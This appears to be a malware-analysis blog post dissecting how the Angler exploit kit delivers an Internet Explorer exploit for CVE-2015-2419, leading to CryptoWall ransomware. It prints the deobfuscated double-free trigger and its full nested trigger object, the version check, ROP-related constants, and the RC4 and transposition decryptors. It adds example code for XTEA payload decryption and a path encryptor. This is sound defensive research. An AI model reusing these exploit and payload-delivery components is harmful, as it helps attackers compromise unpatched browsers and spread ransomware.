Angler exploit kit (EK) adds support for CVE-2015-2419
The Angler exploit kit (EK) recently added an exploit for CVE-2015-2419, an Internet Explorer vulnerability that was patched only this July. Weaponizing freshly patched bugs quickly has long been the habit of the Angler authors, but since the second half of 2014 their target has almost always been Adobe Flash Player. CVE-2015-2419 is the second non-Flash vulnerability the kit has adopted recently; the first was CVE-2015-1671 in Silverlight. This may be a consequence of the new exploit mitigations Adobe introduced in Flash Player, which prevent attackers from using Vector (or similar) objects to take control of a corrupted Flash process. The kit can now choose among Flash, IE and Silverlight exploits depending on the target's environment. It has also wrapped its IE exploit in a new layer of obfuscation and encryption: every time the landing page runs, it must fetch a key and part of the exploit data from the server before the exploit can execute. That data is only sent to a victim that presents a vulnerable browser, and it is protected with XTEA under a home-grown Diffie-Hellman key exchange.
Diffie-Hellman key exchange protecting delivery of the IE exploit
The kit's landing page is already obfuscated at both the HTML and the JavaScript level. Once the first layer is removed, the page profiles the platform, selects the exploit to use and launches it. The IE exploit is obfuscated a second time, and its code is additionally transformed differently for each victim machine using a shared secret negotiated with a Diffie-Hellman (D-H) key exchange. The D-H arithmetic is implemented with the jsbn.js library, in a form very close to the one bundled in cryptico.js.
The victim's browser POSTs the JSON shown below to the attacker's server. The naming follows the Diffie-Hellman convention: g is the base (generator), p is the modulus, and A is (g**a_) mod p, where a_ is the victim's secret exponent and must never leave the browser. Little care is taken over the security of these values: they are produced with Math.random, which is not cryptographically secure, they are far too small, and p is never tested for primality. The value v comes from ScriptEngineBuildVersion(), i.e. the jscript9 build number.
    {"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}
The attacker replies with the base64-encoded structure shown below (the base64 is additionally URL-encoded, hence the %2B and %3D sequences). B is the attacker's D-H reply, (g**b_) mod p, where b_ is the attacker's secret exponent and never crosses the network. k is an encrypted copy of the key needed to decrypt b: the attacker encrypts a random key with XTEA under the D-H shared secret s = (A**b_) mod p. The victim computes the same s on its side, uses it to XTEA-decrypt k, and then uses the recovered key to decrypt b.
    {"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…"}
b holds constants used by the rest of the exploit (the full list is in Appendix III). Placing them two round trips away from the static code is probably meant to frustrate static analysis of the exploit as a whole: with only the landing page in hand, an analyst can follow the control flow but not the values it operates on. For example, ur0pqm8kx is the key that decrypts the shellcode, and stringify is the name of the method invoked on JSON.
    {"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"stringify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl":"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III":"clearInterval","lIlI":"ur0pqm8kx",…}
A further effect is that captured exploit traffic cannot be replayed without the D-H secret. g, A and p are regenerated at random on every run, so a replayed request never matches the attacker's original response; the shared secret derived from it is wrong, k and b therefore decrypt to garbage, and the exploit does not run at all. To observe the attack, an analyst has to do one of the following:
1) break the encryption,
2) break the PRNG, or
3) run the kit live against a vulnerable browser.
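The exchange described above, followed by the first of those three options (breaking the encryption), as an added example that is not part of the original post or of the kit. It reuses the g and p from the captured request as test data; the secret exponents (31337 and 4242), the JSON-shaped request and response objects, and the search bound are constructed, since the post only states that the kit's values are too small without giving numbers. The point it makes: g, A, p and B all cross the wire in the clear, so a passive observer who can guess the size of the victim's secret exponent recovers the shared secret s, and with it k and b.

```javascript
// Added example (not Angler's code): D-H as the landing page uses it, plus a passive
// observer brute-forcing the victim's secret exponent when that exponent is small.
// g and p are the sample values from the captured request; the exponents and the
// search bound are constructed assumptions.

function modPow(base, exp, mod) {           // square-and-multiply on BigInt
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

const hex = n => n.toString(16);
const big = h => BigInt('0x' + h);

// Victim side: the JSON the landing page POSTs ({g, A, p, v}).
function victimRequest(gHex, pHex, secretA, buildNumber) {
  const g = big(gHex), p = big(pHex);
  return { g: gHex, A: hex(modPow(g, secretA, p)), p: pHex, v: String(buildNumber) };
}

// Attacker side: B = g^b_ mod p goes back to the victim, s = A^b_ mod p stays on the server.
function attackerResponse(request, secretB) {
  const g = big(request.g), p = big(request.p), A = big(request.A);
  return { B: hex(modPow(g, secretB, p)), s: modPow(A, secretB, p) };
}

// Victim side: s = B^a_ mod p; both sides now hold the same s and can key XTEA with it.
function victimSecret(response, request, secretA) {
  return modPow(big(response.B), secretA, big(request.p));
}

// Passive observer: walk g^1, g^2, ... mod p until the value equals A. Cheap exactly
// when the secret exponent is small. Returns the exponent, or null within the bound.
function bruteForceExponent(gHex, AHex, pHex, maxExp) {
  const g = big(gHex), p = big(pHex), A = big(AHex);
  let cur = 1n;
  for (let a = 1n; a <= maxExp; a += 1n) {
    cur = (cur * g) % p;
    if (cur === A) return a;
  }
  return null;
}

function demo() {
  const gHex = '78ab123a5d20fda81a9420c241a79f4f'; // from the captured request on this page
  const pHex = '3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d'; // likewise; never checked for primality
  const a_ = 31337n, b_ = 4242n;                    // constructed small secret exponents
  const req = victimRequest(gHex, pHex, a_, 17840);
  const resp = attackerResponse(req, b_);
  const sVictim = victimSecret(resp, req, a_);
  // The observer saw req and resp.B only, never a_ or b_.
  const recoveredA = bruteForceExponent(req.g, req.A, req.p, 1n << 17n);
  const sObserver = recoveredA === null ? null : modPow(big(resp.B), recoveredA, big(req.p));
  return {
    req, resp, sVictim, recoveredA, sObserver,
    agreed: sVictim === resp.s,       // the protocol itself works
    broken: sObserver === resp.s,     // and so does the observer
  };
}
```

With a 128-bit p the brute force above is only feasible because the exponent is small; the same search with an exponent near 2^40 finds nothing within the bound, which is why the size of the Math.random-derived values, not just their predictability, is what makes the scheme weak.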
It is not yet clear why the attackers protect only the constants rather than the whole exploit. Our initial guess is that it simply spares them trouble.
CVE-2015-2419 vulnerability details
CVE-2015-2419 is a double free in jscript9's native JSON API, patched in July of this year. It is triggered when JSON.stringify serializes a deeply nested object together with a replacer function. The complete argument the attacker passes to JSON.stringify is listed in Appendix IV. In the deobfuscated exploit the trigger looks like this:
    Il1I4['prototype'].yc = function(a) {
        if (!a.ma(!1)) throw new Error(3);
        a.kb(!1);
        a.ib(!1);
        JSON["stringify"](this.Pc, this.uc);   // this.Pc: the nested object of Appendix IV; this.uc: the replacer
        a.ob(!1);
        CollectGarbage();                      // force the garbage collector to act on the freed memory
    };
Browser version check
The exploit depends on specific builds of jscript9.dll. The decoded JSON response above maps each supported jscript9.dll build number to a build-specific constant:
    "llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":4088840}
The target build is verified by the following code; only jscript9 11.0 builds up to 17905 (the last build in the table) get past it, anything else aborts with the build number as the error text:
    try {
        var c = a.D["ScriptEngineMajorVersion"](),
            d = a.D["ScriptEngineMinorVersion"](),
            e = a.D["ScriptEngineBuildVersion"](),
            b = c == 11 && d == 0 && e <= 17905;
    } catch (f) {}
    if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');
Shellcode decryption stage
The shellcode is embedded in the deobfuscated IE exploit, but in encrypted form; the decryption key comes from the decoded JSON response above. In this sample it is ur0pqm8kx.
The decryption routine (RC4) is given in Appendix II.
Payload stage
This new IE exploit has been used to deliver the CryptoWall ransomware, as seen from this kit in recent months. The payload travels over the network in encrypted form. Its download URL is built as follows:
    url = "https://" + window["location"]["host"] + "/" + base64_decode(a);
Here a comes from the decoded JSON response above; in this sample it is xexec.
xexec() is a custom function added to String.prototype: it takes the key from the kit's landing page and decrypts the path needed to fetch the payload.
    String['prototype']['xexec'] = function() {
        return decryption_routine(encrypted_path);   // decryption_routine is the Appendix I function
    };
encrypted_path lives on the kit's landing page:
    encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZlFVlVFM0XPV3ThBJPO1I G 0 Z tp M 2';
Running it through the decryption routine in Appendix I yields the following base64-encoded string:
    decrypted_path = 'ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVwd3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPVZ1MVBhV0lFTFlOX3JPMGI2Z0pt';
which base64-decodes to:
    "father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"
This is the payload path.
The payload fetched from that path is itself encrypted, so the shellcode decrypts it with XTEA. The XTEA key sits in the deobfuscated HTML page; in this sample it is Du9JOBgkbfzGvmFF.
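XTEA is the one primitive the kit reuses: under the D-H shared secret it protects k and b in the exploit delivery stage, and under the landing-page key it protects the downloaded payload. The following is an added example, not the kit's code, of decrypting a payload with the sample key. The post names only the algorithm and the key, so the block mode (ECB over 8-byte blocks), the 32-round count, the little-endian word order, the zero padding and the use of the 16 ASCII characters of the key as its 128 bits are all assumptions; the encrypted payload it decrypts is constructed in the block itself, not a real CryptoWall sample.

```javascript
// Added example (not Angler's code): XTEA payload decryption with the sample key
// Du9JOBgkbfzGvmFF. Assumed: ECB, 32 rounds, little-endian words, zero padding.
const DELTA = 0x9E3779B9;
const ROUNDS = 32;

// One 64-bit block, standard XTEA round function; all arithmetic is kept mod 2^32
// with ">>> 0" because JS bitwise operators work on 32-bit integers.
function xteaEncryptBlock([v0, v1], key) {
  let sum = 0;
  for (let i = 0; i < ROUNDS; i++) {
    v0 = (v0 + ((((v1 << 4) ^ (v1 >>> 5)) + v1) ^ (sum + key[sum & 3]))) >>> 0;
    sum = (sum + DELTA) >>> 0;
    v1 = (v1 + ((((v0 << 4) ^ (v0 >>> 5)) + v0) ^ (sum + key[(sum >>> 11) & 3]))) >>> 0;
  }
  return [v0, v1];
}

function xteaDecryptBlock([v0, v1], key) {
  let sum = (DELTA * ROUNDS) >>> 0;
  for (let i = 0; i < ROUNDS; i++) {
    v1 = (v1 - ((((v0 << 4) ^ (v0 >>> 5)) + v0) ^ (sum + key[(sum >>> 11) & 3]))) >>> 0;
    sum = (sum - DELTA) >>> 0;
    v0 = (v0 - ((((v1 << 4) ^ (v1 >>> 5)) + v1) ^ (sum + key[sum & 3]))) >>> 0;
  }
  return [v0, v1];
}

// The 16 key characters become four little-endian 32-bit words (an assumption).
function keyWords(keyStr) {
  const b = Buffer.from(keyStr, 'latin1');
  if (b.length !== 16) throw new Error('XTEA key must be exactly 16 bytes');
  return [0, 4, 8, 12].map(o => b.readUInt32LE(o));
}

function xteaEncrypt(plain, keyStr) {
  const key = keyWords(keyStr);
  const src = Buffer.concat([plain, Buffer.alloc((8 - plain.length % 8) % 8)]); // zero padding
  const out = Buffer.alloc(src.length);
  for (let o = 0; o < src.length; o += 8) {
    const [c0, c1] = xteaEncryptBlock([src.readUInt32LE(o), src.readUInt32LE(o + 4)], key);
    out.writeUInt32LE(c0, o);
    out.writeUInt32LE(c1, o + 4);
  }
  return out;
}

function xteaDecrypt(cipher, keyStr) {
  // A truncated download is the usual failure: refuse it rather than decrypt garbage.
  if (cipher.length === 0 || cipher.length % 8 !== 0) {
    throw new Error('ciphertext length ' + cipher.length + ' is not a multiple of the 8-byte block');
  }
  const key = keyWords(keyStr);
  const out = Buffer.alloc(cipher.length);
  for (let o = 0; o < cipher.length; o += 8) {
    const [p0, p1] = xteaDecryptBlock([cipher.readUInt32LE(o), cipher.readUInt32LE(o + 4)], key);
    out.writeUInt32LE(p0, o);
    out.writeUInt32LE(p1, o + 4);
  }
  return out;
}

// The check to run after decrypting: the dropper is a Windows executable, so the
// first two bytes must be the 'MZ' DOS header; anything else means a wrong key or mode.
function looksLikeExecutable(buf) {
  return buf.length >= 2 && buf[0] === 0x4d && buf[1] === 0x5a;
}

const PAYLOAD_KEY = 'Du9JOBgkbfzGvmFF';   // from the deobfuscated landing page (this sample)
// Constructed stand-in for the encrypted download: an 'MZ' header and filler, not a real binary.
const SAMPLE_PLAINTEXT = Buffer.concat([
  Buffer.from('MZ'), Buffer.alloc(62), Buffer.from('constructed payload body, not a real dropper'),
]);
const SAMPLE_CIPHERTEXT = xteaEncrypt(SAMPLE_PLAINTEXT, PAYLOAD_KEY);

function demoPayloadDecrypt() {
  const plain = xteaDecrypt(SAMPLE_CIPHERTEXT, PAYLOAD_KEY);
  return { executable: looksLikeExecutable(plain), body: plain.subarray(0, SAMPLE_PLAINTEXT.length) };
}
```

Zero padding means the decrypted buffer can carry up to seven trailing zero bytes beyond the original file; for a PE that is harmless, but the length has to come from somewhere else (the PE headers, or a length field the kit would have to transmit) if the exact file is needed.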
Appendix I
The decryption routine that recovers the payload path. The key lives on the kit's landing page, as do the variables p and i, which hold the names of the array methods the routine calls (push and indexOf, judging by how they are used).
    window["osSnUV"] = new Function('text',
        // key, p and i come from the landing page: the key itself and the names of the
        // Array push and indexOf methods (inferred from how they are used below)
        "var cryptKey = key, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];" +
        "sortArray.sort(); var keySize = sortArray.length;" +
        // keyArray[j] = position in the unsorted key of its j-th smallest character
        "for (var i=0; i<keySize; i++) {keyArray." + p + "(rawArray." + i + "(sortArray[i]));}" +
        // pad the ciphertext with spaces to a whole number of keySize-character rows
        "var k = keySize - text.length % keySize;" +
        "for(var l = 0; l<k;l++) {text += ' ';}" +
        "var endStr = '', i,j,line,newLine;" +
        // un-permute each row: output character j is row character keyArray[j]
        "for (i = 0; i < text.length; i += keySize) {" +
        "  line = text.substr(i,keySize).split('');" +
        "  newLine = '';" +
        "  for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}" +
        "  endStr = endStr + newLine;" +
        "}" +
        // strip the padding (and any other whitespace)
        "endStr=endStr.replace(/\\s/g,'');" +
        "return endStr;");
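The routine above, and the path recovery walked through in the payload stage, are a row-wise transposition cipher: the key's characters are sorted, and for each row of key.length ciphertext characters the j-th plaintext character is the row character at the position the j-th smallest key character occupies in the unsorted key; spaces are the padding and are stripped only after un-permuting. The following added example, not the kit's code, re-implements that decryptor and adds the encryptor the kit never ships (the inverse permutation), then carries a path through the full chain: base64, transposition, and back into the payload URL. The key kZ3qR8mWbT1nPxYa and the host example.invalid are constructed, since the post does not give this sample's transposition key; the path is the one decoded in the post.

```javascript
// Added example (not Angler's code): the Appendix I transposition, both directions.
// Constructed key and host; the path is the one decoded on this page.

function keyPermutation(key) {              // keyArray in the kit's routine
  const raw = key.split('');
  const sorted = key.split('').sort();
  return sorted.map(ch => raw.indexOf(ch));
}

// Same behaviour as the kit's decryptor: pad to whole rows (a full blank row when the
// input is already aligned, as the kit does), un-permute each row, drop all whitespace.
function transposeDecrypt(key, text) {
  const perm = keyPermutation(key);
  const n = perm.length;
  const padded = text + ' '.repeat(n - text.length % n);
  let out = '';
  for (let i = 0; i < padded.length; i += n) {
    const row = padded.slice(i, i + n);
    for (let j = 0; j < n; j++) out += row[perm[j]];
  }
  return out.replace(/\s/g, '');
}

// Inverse: plaintext character j of each row goes to ciphertext position perm[j].
// Two caveats the kit's decryptor imposes: indexOf maps repeated key characters to the
// same position, so such a key silently drops data (this refuses it), and whitespace in
// the plaintext is indistinguishable from padding (base64 has none, which is why the
// path is base64-encoded first).
function transposeEncrypt(key, text) {
  const perm = keyPermutation(key);
  const n = perm.length;
  if (new Set(perm).size !== n) throw new Error('key must not repeat a character');
  if (/\s/.test(text)) throw new Error('plaintext must not contain whitespace');
  const padded = text + ' '.repeat((n - text.length % n) % n);
  let out = '';
  for (let i = 0; i < padded.length; i += n) {
    const row = padded.slice(i, i + n);
    const enc = new Array(n);
    for (let j = 0; j < n; j++) enc[perm[j]] = row[j];
    out += enc.join('');
  }
  return out;   // padding spaces stay where the permutation put them: their positions matter
}

// The URL construction from the payload stage: decrypt, base64-decode, prepend the host.
function buildPayloadUrl(host, key, encryptedPath) {
  const b64 = transposeDecrypt(key, encryptedPath);
  return 'https://' + host + '/' + Buffer.from(b64, 'base64').toString('latin1');
}

const SAMPLE_KEY = 'kZ3qR8mWbT1nPxYa';   // constructed: 16 distinct characters
const PAYLOAD_PATH = 'father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm';

function demoPathRoundTrip() {
  const b64 = Buffer.from(PAYLOAD_PATH, 'latin1').toString('base64');
  const encryptedPath = transposeEncrypt(SAMPLE_KEY, b64);   // what a landing page would carry
  return {
    b64,
    encryptedPath,
    recovered: transposeDecrypt(SAMPLE_KEY, encryptedPath),
    url: buildPayloadUrl('example.invalid', SAMPLE_KEY, encryptedPath),
  };
}
```

Because the whitespace strip happens after the permutation, any space inside a captured encrypted_path is positional data, not noise; when extracting the string from a landing page, keep it byte for byte.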
Appendix II
The RC4 routine that decrypts the shellcode:
    function DecryptionRoutine(key, encrypted_shellcode) {
        var d = [], e = 0, f, h, decrypted_shellcode = '';
        // key-scheduling algorithm: initialise the 256-entry state and permute it with the key
        for (h = 0; h < 256; h++) { d[h] = h; }
        for (h = 0; h < 256; h++) {
            e = (e + d[h] + key.charCodeAt(h % key.length)) % 256;
            f = d[h]; d[h] = d[e]; d[e] = f;
        }
        // pseudo-random generation: XOR each ciphertext byte with the next keystream byte
        for (var k = e = h = 0; k < encrypted_shellcode.length; k++) {
            h = (h + 1) % 256;
            e = (e + d[h]) % 256;
            f = d[h]; d[h] = d[e]; d[e] = f;
            decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]);
        }
        return decrypted_shellcode;
    }
Appendix III
Contents of the constant block b (as decoded; the dump is cut off at the end):
    {"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"stringify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl":"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III":"clearInterval","lIlI":"ur0pqm8kx","IlII":"https://","lllI":"/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP","IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect","IIIlI":11,"lIIll":0,"lllll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5,"IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1,"llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":16776960,"IlIIl":16777215,"llllI":4294967040,"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"llllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366,"IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000,"IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76,"lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44,"IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110,"IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll":7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542],"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476],"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl":90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,"llIIIl":1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":4088840
Appendix IV
The argument the attacker hands to JSON.stringify to trigger CVE-2015-2419. Pc is an object eight levels deep: every level holds the keys a0 to a19, a0 points to the next level and every other value is an 8-character string. The replacer uc returns each value unchanged.
    Pc = {"a0":
           {"a0":
             {"a0":
               {"a0":
                 {"a0":
                   {"a0":
                     {"a0":
                       {"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6":"058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM","a10":"6YCTSRH0","a11":"N0AJ34YX","a12":"AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR","a18":"356Q7028","a19":"8136URQ8"},
                      "a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV","a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78","a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77","a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},
                    "a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS","a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X","a10":"B3AIE208","a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2","a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},
                  "a1":"7P0RT015","a2":"IQPV6IKK","a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9":"6W4HEW6L","a10":"2C182X5P","a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15":"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},
                "a1":"R88W7ICS","a2":"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8":"U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF","a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14":"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"},
              "a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8","a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM","a11":"1M6IX20K","a12":"X64LGJKK","a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783","a19":"0T08F051"},
            "a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40","a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y","a11":"N04O0IC8","a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17":"0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},
          "a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4":"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10":"HP3C3671","a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4","a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"};
    uc = function (a, b) { return b };